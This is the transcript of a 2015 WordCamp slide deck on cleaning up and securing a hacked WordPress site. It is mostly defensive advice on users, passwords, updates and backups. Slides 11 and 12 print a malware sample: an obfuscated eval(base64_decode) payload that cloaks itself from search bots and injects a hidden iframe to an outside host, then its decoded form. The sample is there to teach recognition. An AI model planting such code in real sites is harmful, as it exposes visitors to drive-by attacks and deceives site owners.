$30 off During Our Annual Pro Sale. View Details »

You Have Been Hacked? Now What?

You Have Been Hacked? Now What?

WordCamp San Diego 2015. Learn what you need to do once your website gets hacked and how not have it happen again.

Michele Butcher

March 28, 2015
Tweet

More Decks by Michele Butcher

Other Decks in Technology

Transcript

  1. Your Site Has Been Hacked,
    Now What?
    Michele Butcher
    CantSpeakGeek.com WPSecurityLock.com
    @Michele_Butcher
    Slides can be found at: http://mlb.pw/WCSD2015
    @Michele_Butcher

    View Slide

  2. WordPress Specialist at 

    WP Security Lock
    Head Geek at Can’t

    Speak Geek
    Sometimes a designer of pretty 

    websites and graphics
    Southern Illinois Meetup Co-Organizer
    Beginners and Intermediate WordPress 

    Instructor at John A Logan College
    Michele Butcher
    @Michele_Butcher

    View Slide

  3. It all starts one dreadful
    morning……
    @Michele_Butcher

    View Slide

  4. First you see this
    @Michele_Butcher

    View Slide

  5. Then you realize this has happened
    @Michele_Butcher

    View Slide

  6. Which made you feel like this…
    @Michele_Butcher

    View Slide

  7. What do you do when
    your site gets hacked?
    @Michele_Butcher

    View Slide

  8. First option:
    Pay someone else to clean it.
    There are many options out there who will
    clean your site. Here is who I suggest.
    WP Security Lock
    https://wpsecuritylock.com
    Sucuri Security
    http://sucuri.net/
    @Michele_Butcher
    Hack Repair
    http://hackrepair.com

    View Slide

  9. Second Option:
    Clean it yourself
    • Cheapest
    • Most time consuming
    • No one knows your site better than you do
    • You just have to know what to look for
    I do not suggest this if you are not comfortable
    reading HTML, PHP, and CSS.
    @Michele_Butcher

    View Slide

  10. Pretty Code
    @Michele_Butcher

    View Slide

  11. Not So Pretty Code
    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX
    2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJy
    wnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd
    3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50Jywn
    YnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ld
    HNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZH
    J1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmV
    zaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGkn
    KTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1N
    SIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIi
    wgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJ
    yYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQu
    MjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguM
    TA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS
    4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzM
    uMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4
    LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44O
    C4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYX
    koIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU
    1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwi
    NzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3M
    i4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCS
    k7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQp
    mb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxv
    bmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfa
    XAybG9uZyA
    +PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0K
    Zm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWR
    VJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn
    0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB
    4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3
    WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY
    +JzsNCn0='));
    @Michele_Butcher

    View Slide

  12. error_reporting(0);
    $bot = FALSE ;
    $user_agent_to_filter =
    array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blog
    pulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.
    de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-
    resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
    $stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    array("64.68.80.0" ,"64.68.87.255" ),
    array("66.102.0.0", "66.102.15.255"),
    array("64.233.160.0","64.233.191.255"),
    array("66.249.64.0", "66.249.95.255"),
    array("72.14.192.0", "72.14.255.255"),
    array("209.85.128.0","209.85.255.255"),
    array("198.108.100.192","198.108.100.207"),
    array("173.194.0.0","173.194.255.255"),
    array("216.33.229.144","216.33.229.151"),
    array("216.33.229.160","216.33.229.167"),
    array("209.185.108.128","209.185.108.255"),
    array("216.109.75.80","216.109.75.95"),
    array("64.68.88.0","64.68.95.255"),
    array("64.68.64.64","64.68.64.127"),
    array("64.41.221.192","64.41.221.207"),
    array("74.125.0.0","74.125.255.255"),
    array("65.52.0.0","65.55.255.255"),
    array("74.6.0.0","74.6.255.255"),
    array("67.195.0.0","67.195.255.255"),
    array("72.30.0.0","72.30.255.255"),
    array("38.0.0.0","38.255.255.255")
    );
    $my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
    foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
    }
    foreach ($user_agent_to_filter as $bot_sign){
    if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
    }
    if (!$bot) {
    echo '';
    } @Michele_Butcher

    View Slide

  13. When cleaning your site, add
    clean copies of core, your
    theme and your plugins. It
    makes cleaning so much
    easier.
    @Michele_Butcher

    View Slide

  14. This is a good time to make
    an audit of everything on
    your site and delete what is
    not being used. You can
    always add other themes
    and plugins back later when
    you need it.
    @Michele_Butcher

    View Slide

  15. Now you have all the malware
    removed, that does not mean we are done
    @Michele_Butcher

    View Slide

  16. Change the salts in your
    wp-config.php file
    @Michele_Butcher

    View Slide

  17. Check your users!
    • You could have unwanted users
    • Delete the unwanted guests immediately
    • if you use “admin” as a username, delete it and
    make a new user name
    • Delete all users that are no longer using your
    dashboard (Old devs, designers, guests)
    • Only give others the access they need, not what
    they want. A guest blogger should never be an
    admin, only a contributor.
    @Michele_Butcher

    View Slide

  18. Check your FTP accounts
    on your server
    You could have unwanted users here as well
    @Michele_Butcher

    View Slide

  19. Check your File Permissions
    Files should be 644
    Directories should be 755
    @Michele_Butcher

    View Slide

  20. Add some Security to your site
    • iThemes Security or iThemes Security Pro
    • Jetpack (BruteProtect and VaultPress)
    • WordFence
    • Sucuri Firewall
    Some trusted plugins
    @Michele_Butcher

    View Slide

  21. Change your login
    information
    • WordPress Logins and passwords
    • cPanel Logins and passwords
    • Database logins and passwords

    (Remember to change them in your wp-config.php)
    • Hosting Logins and passwords
    @Michele_Butcher

    View Slide

  22. When it comes to usernames and
    passwords, here are a few tips.
    • NEVER use “admin” as a username and
    “password”as the password. NEVER on
    anything!
    • The harder a password is to remember, the
    harder is to hack
    • Use something like LastPass, 1Password, or
    KeyPass to store your passwords
    @Michele_Butcher

    View Slide

  23. What do you do to not get
    hacked again?
    @Michele_Butcher

    View Slide

  24. First and most important!
    UPDATE

    UPDATE

    UPDATE
    Update core, update plugins, update themes!
    @Michele_Butcher

    View Slide

  25. A note on updating
    If you use a theme and/or plugin that was
    purchased from Envato, Theme Forest, or Code
    Canyon please mark the box under each
    purchased item on the download page to be
    notified by email of updates. That is the only way
    they notify their customers of updates.
    This is part of the reason the RevSlider Soak Soak
    infection was so high.
    @Michele_Butcher

    View Slide

  26. Pay attention to WordPress
    news and security sites
    • WP Tavern
    • WP Security Bloggers
    • Sucuri Blog
    • WP Security Lock
    • Advanced WordPress (Facebook)
    • Twitter
    @Michele_Butcher

    View Slide

  27. Only use trusted and
    supported themes and plugins
    Do NOT use a theme or plugin
    • That has not been updated in more than a
    year
    • No one is responding in the support forums
    • If it shows that it does not work in the
    current version of core
    @Michele_Butcher

    View Slide

  28. Start Making Backups
    • Backup Buddy
    • BackWPUp
    • VaultPress (Jetpack)
    • Check with your hosting company to see if they do
    backups as well
    • iThemes Security (free and Pro) will do database
    backups
    @Michele_Butcher

    View Slide

  29. Speaking of backups…
    Save them somewhere other than your server.
    Most have options to send them to an Amazon
    S3 account, Dropbox, email, or download to
    your machine.
    @Michele_Butcher

    View Slide

  30. Lastly, be active with your site. You
    know your site best. If something
    does not feel right, look into it.
    Also, do not ignore your website.
    No one likes a zombie website.
    @Michele_Butcher

    View Slide

  31. And remember…
    @Michele_Butcher

    View Slide

  32. Don’t
    Let
    Security
    Make
    You
    This
    Guy!
    @Michele_Butcher

    View Slide

  33. Questions?
    @Michele_Butcher

    View Slide

  34. Thank you!
    Michele Butcher
    http://CantSpeakGeek.com
    https:WPSecurityLock.com
    @Michele_Butcher
    Slides can be found at: http://mlb.pw/WCSD2015
    @Michele_Butcher

    View Slide